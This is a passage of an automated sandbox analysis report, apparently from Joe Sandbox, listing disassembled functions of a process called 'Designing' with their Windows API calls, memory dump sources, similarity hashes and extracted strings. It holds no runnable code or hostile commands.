                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 1268354404-2063206799
                                                                                                                                                                              • Opcode ID: f53f690b4ff73c755abb77106c2da9d747e68a29c0074ee6a4ef67d5f7392e6e
                                                                                                                                                                              • Instruction ID: 01c522f7c18cc5f2d397df836aff7fa51bc94fc26918bd61a28da04533b32e84
                                                                                                                                                                              • Opcode Fuzzy Hash: f53f690b4ff73c755abb77106c2da9d747e68a29c0074ee6a4ef67d5f7392e6e
                                                                                                                                                                              • Instruction Fuzzy Hash: D0518D34A00249AFDB24DF2ACC45BAA7BB5FF49710F144518F946A72E0D7B0E990DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetCursorPos.USER32(?), ref: 00DA19E1
                                                                                                                                                                                • Part of subcall function 00DA19CD: ScreenToClient.USER32(00000000,?), ref: 00DA19FE
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000001), ref: 00DA1A23
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000002), ref: 00DA1A3D
                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00E395C7
                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00E395CD
                                                                                                                                                                              • ReleaseCapture.USER32 ref: 00E395D3
                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00E3966E
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E39681
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00E3975B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
                                                                                                                                                                              • API String ID: 1924731296-3832140312
                                                                                                                                                                              • Opcode ID: db73ca406e4d86137fb2d387b8cdce339e4210edaf968403252a3692e1f3dbc8
                                                                                                                                                                              • Instruction ID: 12f34bf3138a652ef188e1af699e53eecdf0af1bf24e8d5f0b87719e1c3ba724
                                                                                                                                                                              • Opcode Fuzzy Hash: db73ca406e4d86137fb2d387b8cdce339e4210edaf968403252a3692e1f3dbc8
                                                                                                                                                                              • Instruction Fuzzy Hash: F651B171104304AFD704EF21DC5AFAA7BE4FB88714F000A1DF696A72E2CB719949CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00DF0D31,00000001,0000138C,00000001,00000000,00000001,?,00E1EEAE,00E72430), ref: 00E0A091
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00DF0D31,00000001), ref: 00E0A09A
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00DF0D31,00000001,0000138C,00000001,00000000,00000001,?,00E1EEAE,00E72430,?), ref: 00E0A0BC
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00DF0D31,00000001), ref: 00E0A0BF
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E0A1E0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                              • API String ID: 747408836-2268648507
                                                                                                                                                                              • Opcode ID: 56c969a517b661fa6d89b07df94cf6f014314bfc1224d5e6cc00ff58288c5eb6
                                                                                                                                                                              • Instruction ID: 0bf33d61160dde9c646c49f06c760649671690a5568a004835cd26dc618542c1
                                                                                                                                                                              • Opcode Fuzzy Hash: 56c969a517b661fa6d89b07df94cf6f014314bfc1224d5e6cc00ff58288c5eb6
                                                                                                                                                                              • Instruction Fuzzy Hash: C2412B7280120DAACF14EBE0DD46EEEB778EF19340F540065B506B6092EB75AF49CB71
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E01093
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E010AF
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E010CB
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E010F5
                                                                                                                                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E0111D
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E01128
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E0112D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                              • API String ID: 323675364-22481851
                                                                                                                                                                              • Opcode ID: 5e63cd866b0f05be69f80cf093ef050d6893bbe71aa90bb319115b0ba0cf712d
                                                                                                                                                                              • Instruction ID: 055a31f85ad49f31e6f4d1f278c245769c9e2976e6f91dcf393b7b0ebe3d17f4
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e63cd866b0f05be69f80cf093ef050d6893bbe71aa90bb319115b0ba0cf712d
                                                                                                                                                                              • Instruction Fuzzy Hash: BE41F572C1022DAFCF15EBA4EC859EEBB78FF14750F04416AE901B61A1EB319E45CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E34AD9
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00E34AE0
                                                                                                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E34AF3
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00E34AFB
                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E34B06
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00E34B10
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E34B1A
                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00E34B30
                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00E34B3C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                              • String ID: static
                                                                                                                                                                              • API String ID: 2559357485-2160076837
                                                                                                                                                                              • Opcode ID: fd82d1d306e426def44cdb557b53f9b834fa228bcce9d829b675f198ad5b8550
                                                                                                                                                                              • Instruction ID: 6e8431d03acdc5a70528636e4992574933e0be6b02a95944368331be51fe00d2
                                                                                                                                                                              • Opcode Fuzzy Hash: fd82d1d306e426def44cdb557b53f9b834fa228bcce9d829b675f198ad5b8550
                                                                                                                                                                              • Instruction Fuzzy Hash: BF315872100219AFDF129FA5DC0CFDA7FA9EF09324F110211FA14B61A0C735E864DBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00E0D1BE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconLoad
                                                                                                                                                                              • String ID: \+$\+$`+$blank$info$question$stop$warning
                                                                                                                                                                              • API String ID: 2457776203-3382907240
                                                                                                                                                                              • Opcode ID: 1731c3b584d5c2e9b554cfa44f8bfaad7a9435d14200b8471cb050f88d3a1560
                                                                                                                                                                              • Instruction ID: 39d99dc89cafeaa17760d94351a6d04d48b1899fb9a38e585765c2164fbdd463
                                                                                                                                                                              • Opcode Fuzzy Hash: 1731c3b584d5c2e9b554cfa44f8bfaad7a9435d14200b8471cb050f88d3a1560
                                                                                                                                                                              • Instruction Fuzzy Hash: 7411DA3528D307BEE7055B94EC82EAA77ACDF15769B20102AF501B71C1DFB46AC14370
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00E246B9
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00E246E7
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00E246F1
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2478A
                                                                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00E2480E
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E24932
                                                                                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00E2496B
                                                                                                                                                                              • CoGetObject.OLE32(?,00000000,00E40B64,?), ref: 00E2498A
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00E2499D
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E24A21
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E24A35
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 429561992-0
                                                                                                                                                                              • Opcode ID: b4fca41430291e6e820907dd34b3216ab788e194f5e3e566e10f52bcbf4712b3
                                                                                                                                                                              • Instruction ID: aa98829eb29889718fb02f781508ac44a1a569b1a2c82ef5090ba4cfd6ce7654
                                                                                                                                                                              • Opcode Fuzzy Hash: b4fca41430291e6e820907dd34b3216ab788e194f5e3e566e10f52bcbf4712b3
                                                                                                                                                                              • Instruction Fuzzy Hash: 97C179B16083159FC704DF68D88496BBBE9FF89708F00591DF98AAB290D731ED45CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00E18538
                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E185D4
                                                                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00E185E8
                                                                                                                                                                              • CoCreateInstance.OLE32(00E40CD4,00000000,00000001,00E67E8C,?), ref: 00E18634
                                                                                                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E186B9
                                                                                                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00E18711
                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00E1879C
                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E187BF
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00E187C6
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00E1881B
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00E18821
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2762341140-0
                                                                                                                                                                              • Opcode ID: 92e51debf67fdb0f8a48409b0bccf508e3c8022df0375b2db297c3e13e8b8dbb
                                                                                                                                                                              • Instruction ID: d6fe22ee8836019cc52d5451f18b9635991c3ce10999ec1f18c66a49235a7836
                                                                                                                                                                              • Opcode Fuzzy Hash: 92e51debf67fdb0f8a48409b0bccf508e3c8022df0375b2db297c3e13e8b8dbb
                                                                                                                                                                              • Instruction Fuzzy Hash: 98C10A75A00109AFCB14DF65C988DAEBBF5FF48314B148599E419EB261DB30ED85CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E0039F
                                                                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00E003F8
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00E0040A
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E0042A
                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00E0047D
                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E00491
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E004A6
                                                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00E004B3
                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E004BC
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E004CE
                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E004D9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                                                              • Opcode ID: 480eb83264ea391e7945e4aeaa049698c70846509deecdc7ac7b64fcda6dadd2
                                                                                                                                                                              • Instruction ID: 19528a24f01288bf8f0d5f7aebae4de50e4ea74fd04aa3349db96cc9d74d617f
                                                                                                                                                                              • Opcode Fuzzy Hash: 480eb83264ea391e7945e4aeaa049698c70846509deecdc7ac7b64fcda6dadd2
                                                                                                                                                                              • Instruction Fuzzy Hash: 23415135A0021DDFCB14DF65DC48AEE7FB9EF48354F008469E965B7261C734A985CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00E0A65D
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00E0A6DE
                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00E0A6F9
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00E0A713
                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00E0A728
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00E0A740
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00E0A752
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00E0A76A
                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00E0A77C
                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00E0A794
                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00E0A7A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                              • Opcode ID: e3be25dea2e4847096807e88e937b6926c1816e00f5f51bbf2d37f822f19cbf9
                                                                                                                                                                              • Instruction ID: a24d4bc819ea59b5d95a500b0e27ab20cac19d814ecb24d74a7cb923130c2eab
                                                                                                                                                                              • Opcode Fuzzy Hash: e3be25dea2e4847096807e88e937b6926c1816e00f5f51bbf2d37f822f19cbf9
                                                                                                                                                                              • Instruction Fuzzy Hash: B341C6645087CDAEFF319660D8043A5BEB06F1134CF0CD06AD5C67A1C2EBA599D8CBA3
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$BuffCharLower
                                                                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                              • API String ID: 707087890-567219261
                                                                                                                                                                              • Opcode ID: 75d52f254688c8613b4b7a6767c82580e1e3ea8848e0c990adf5918f70bc9c7f
                                                                                                                                                                              • Instruction ID: 5291b73314f4cf9cf8b42a734cc2e12494b1f0cd3a2226970f409552f6e60511
                                                                                                                                                                              • Opcode Fuzzy Hash: 75d52f254688c8613b4b7a6767c82580e1e3ea8848e0c990adf5918f70bc9c7f
                                                                                                                                                                              • Instruction Fuzzy Hash: 8751F531A001269BCF18DF6CD9519BEB7A1FF55364F24622AE866F7282D731DD40C7A0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoInitialize.OLE32 ref: 00E241D1
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00E241DC
                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00E40B44,?), ref: 00E24236
                                                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 00E242A9
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00E24341
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E24393
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                              • API String ID: 636576611-1287834457
                                                                                                                                                                              • Opcode ID: 178c7d68c4b4f89e75041c1aab7fa53fab73ec7211a9a65fdcae380fb27f46dc
                                                                                                                                                                              • Instruction ID: 3c534843fca2cc9c847a13ef5e1be3d84c6e441fa1f811bfc3c63e347b0fdb91
                                                                                                                                                                              • Opcode Fuzzy Hash: 178c7d68c4b4f89e75041c1aab7fa53fab73ec7211a9a65fdcae380fb27f46dc
                                                                                                                                                                              • Instruction Fuzzy Hash: CE61A2B1608711DFC310DF65E849B9ABBE4EF49714F001909F585A72A1CB70ED48CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00E18C9C
                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E18CAC
                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E18CB8
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E18D55
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18D69
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18D9B
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E18DD1
